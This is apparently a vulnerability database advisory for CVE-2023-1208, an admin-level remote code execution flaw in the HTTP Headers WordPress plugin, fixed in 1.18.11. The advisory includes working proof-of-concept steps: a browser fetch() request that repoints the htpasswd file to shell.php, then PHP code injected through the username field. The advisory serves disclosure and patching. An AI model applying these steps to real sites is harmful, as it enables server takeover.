WordPress Plugin Vulnerabilities

HTTP Headers < 1.18.11 - Admin+ Remote Code Execution

Description

This plugin allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.

Proof of Concept

--- <= 1.18.10 PoC ---
1. As an admin, visit http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&tab=advanced, and paste the following in your browser's prompt:

await fetch("/wp-admin/options.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": `option_page=http-headers-mtd&action=update&_wpnonce=${jQuery('#_wpnonce').attr('value')}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dhttp-headers%26tab%3Dadvanced&hh_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess&hh_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini&hh_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php&hh_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh_method=htaccess`,
    "method": "POST",
    "mode": "cors"
});
2. Navigate to http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&header=www-authenticate
3. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
4. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
5. Go to /shell.php and see the RCE text.


--- Pre-1.18.8 PoC ---

1. As an admin user within WP Admin, navigate to Settings > HTTP Headers > Advanced settings.
2. Change the "Location of .hh-htpasswd" field: update the file name to "shell.php" (e.g. /var/www/html/shell.php)
3. Navigate to Settings > HTTP Headers > Authentication. Click "Edit" to the right of "WWW-Authenticate".
4. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
5. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
6. Go to /shell.php and see the RCE text.

Affects Plugins

Plugin icon
http-headers
Fixed in 1.18.11

References

CVE
CVE-2023-1208

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
6.6 (medium)

Miscellaneous

Original Researcher
qerogram(at Kakao Style Corp.)
Submitter
qerogram(at Kakao Style Corp.)
Submitter website
https://github.com/qerogram
Verified
Yes
WPVDB ID
e0cc6740-866a-4a81-a93d-ff486b79b7f7

Timeline

Publicly Published
2023-06-19 (about 5 months ago)
Added
2023-06-19 (about 5 months ago)
Last Updated
2023-06-19 (about 5 months ago)

Other

Published
Title
Published
2022-01-19
Title
WP HTML Mail < 3.1 - Unprotected REST-API Endpoint
Published
2020-12-14
Title
Total Upkeep by BoldGrid < 1.14.10 - Sensitive Data Disclosure (Server IP Address, UID etc)
Published
2021-05-26
Title
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Activation
Published
2021-04-20
Title
Redirection for Contact Form 7 < 2.3.4 - Unprotected AJAX Actions
Published
2020-08-03
Title
Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download